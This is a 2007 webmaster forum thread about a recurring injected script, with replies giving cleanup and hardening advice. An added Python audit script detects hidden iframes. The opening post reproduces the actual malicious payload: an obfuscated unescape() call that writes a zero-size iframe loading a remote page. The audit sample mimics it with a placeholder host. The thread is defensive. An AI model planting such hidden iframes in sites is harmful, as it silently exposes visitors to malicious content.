Script Help Please
bajarich



Joined: 16 Apr 2007
Posts: 28
Rank: 5
Location: Southern Pines, NC

Posted: 22 Dec 2007 18:01    Post subject: Script Help Please

Hello,

I am not sure if this is the correct forum for this question. This script keeps showing up in my site's HTML at the bottom of the page.
<SCRIPT>

s=unescape("%3Ciframe%20src%3D%22http%3A//58.65.234.9/~momo/traffic/index.php%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220%25%22%20MARGINHEIGHT%3D%220%22%20MARGINWIDTH%3D%220%22%20SCROLLING%3D%22auto%22%20frameborder%3D%220%22%20NORESIZE%3E%3C/iframe%3E");document.writeln(s);document.close();

</SCRIPT>
I keep deleting it and in a few days it shows back up. I changed my FTP password, figuring someone hacked into my server, but it showed up again. Any thoughts or ideas would be greatly appreciated.

Thanks,

_________________
Rich
bandit



Joined: 18 Dec 2006
Posts: 35

Location: Phantome Zone

Posted: 22 Dec 2007 21:12

Try to look for a file named backup.php in folders on your server; if you have a few sites there, check them also. Delete it if it's there. Change the logins of your scripts. Check your other pages and delete the script from there also.
bajarich



Joined: 16 Apr 2007
Posts: 28
Rank: 5
Location: Southern Pines, NC

Posted: 24 Dec 2007 00:37

Thanks Bandit,

I found 3 more instances of this script on my other sites. I removed them and changed my password again. I did not find the php file you indicated though.

Thanks,

_________________
Rich
rhino



Joined: 23 Dec 2006
Posts: 70
Rank: 12

Posted: 24 Dec 2007 07:12

You might also want to set permissions on your toplist and TGP template
files to 644, and change all script and FTP passwords again (and use high
security passwords)... Several popular scripts (Comus, Smart-Thumbs, Arrow
Trader) have been the target of hackers, and have released security oriented
updates, so best advice there is to make sure you have the most recent script versions.

Probably wouldn't hurt to contact your host and make sure all O/S patches are current, as well as PHP and Zend.

Rhino
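
The checks suggested in the replies above (find the injected script on other pages, look for backup.php, keep files no looser than 644) combined into one audit pass over a web root. This is an added example, not code from any poster in the thread; the extension list and the placeholder host injected.example are assumptions, and the sample page is constructed.

```python
import os, re, stat
from urllib.parse import unquote

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# width/height of 0, 0% or 0px; \b keeps MARGINWIDTH/MARGINHEIGHT from matching
ZERO_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0(?:%|px)?[\"']?(?=[\s>])", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
PAGE_EXTS = (".html", ".htm", ".php", ".tpl")  # assumed page/template extensions

# Constructed sample: same shape as the injected block, placeholder host.
SAMPLE_PAGE = (
    '<html><body>gallery</body></html>\n<SCRIPT>\n'
    's=unescape("%3Ciframe%20src%3D%22http%3A//injected.example/traffic/index.php'
    '%22%20WIDTH%3D%220%25%22%20HEIGHT%3D%220%25%22%20frameborder%3D%220%22%3E'
    '%3C/iframe%3E");document.writeln(s);document.close();\n</SCRIPT>\n')

def hidden_iframes(html):
    """Return the src of each zero-size iframe written via unescape() in a <script>."""
    found = []
    for script in SCRIPT_RE.findall(html):
        for _quote, encoded in UNESCAPE_RE.findall(script):
            decoded = unquote(encoded)  # %XX only; JS %uXXXX escapes are not decoded
            for tag in IFRAME_RE.findall(decoded):
                if ZERO_DIM_RE.search(tag):
                    src = SRC_RE.search(tag)
                    found.append(src.group(1) if src else "")
    return found

def audit(root):
    """Walk a web root and return (path, finding) pairs for the checks in the thread."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            if name.lower() == "backup.php":
                findings.append((path, "file named backup.php"))
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & 0o022:  # writable by group or others, i.e. looser than 644
                findings.append((path, "group/world-writable (%o)" % mode))
            if name.lower().endswith(PAGE_EXTS):
                with open(path, encoding="latin-1") as fh:
                    for src in hidden_iframes(fh.read()):
                        findings.append((path, "hidden iframe -> " + src))
    return findings
```

Running `audit()` on a schedule and comparing the findings against the previous run shows when the block reappears and in which files, which helps narrow down how it is being written back.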
max



Joined: 18 Oct 2006
Posts: 538
Rank: 38

Posted: 25 Dec 2007 16:10

How is it possible to hack a TGP or trade script?
Or is it the hoster's concern?
rhino



Joined: 23 Dec 2006
Posts: 70
Rank: 12

Posted: 26 Dec 2007 17:38

Hi Max,

TGP and trade scripts can be hacked, through the script's admin with
password hurlers running dictionary and common user/pass attacks or
with direct exploitation of code in the TGP/trade scripts that allow the
hacker to install extra scripts on the target domain that add crap to the
TGP gallery pages or rewrite links.

Both the webmaster and host share responsibility for preventing this
crap... Harder to hack a site through a script exploit hosted on a server
that has current software (especially PHP and Zend), and good hosts stay
on top of server software updates.

First line of defense is the webmaster though - 1) keeping your TGP and
trade script software current so any potential exploit issues identified by
the script authors and patched are used, and 2) common sense with
user/password selection, file ownership, and file permissions. IMO there's
a point where the webmaster has to make a decision - ease of script
administration vs site and server security, and it's different for each
webmaster.

Rhino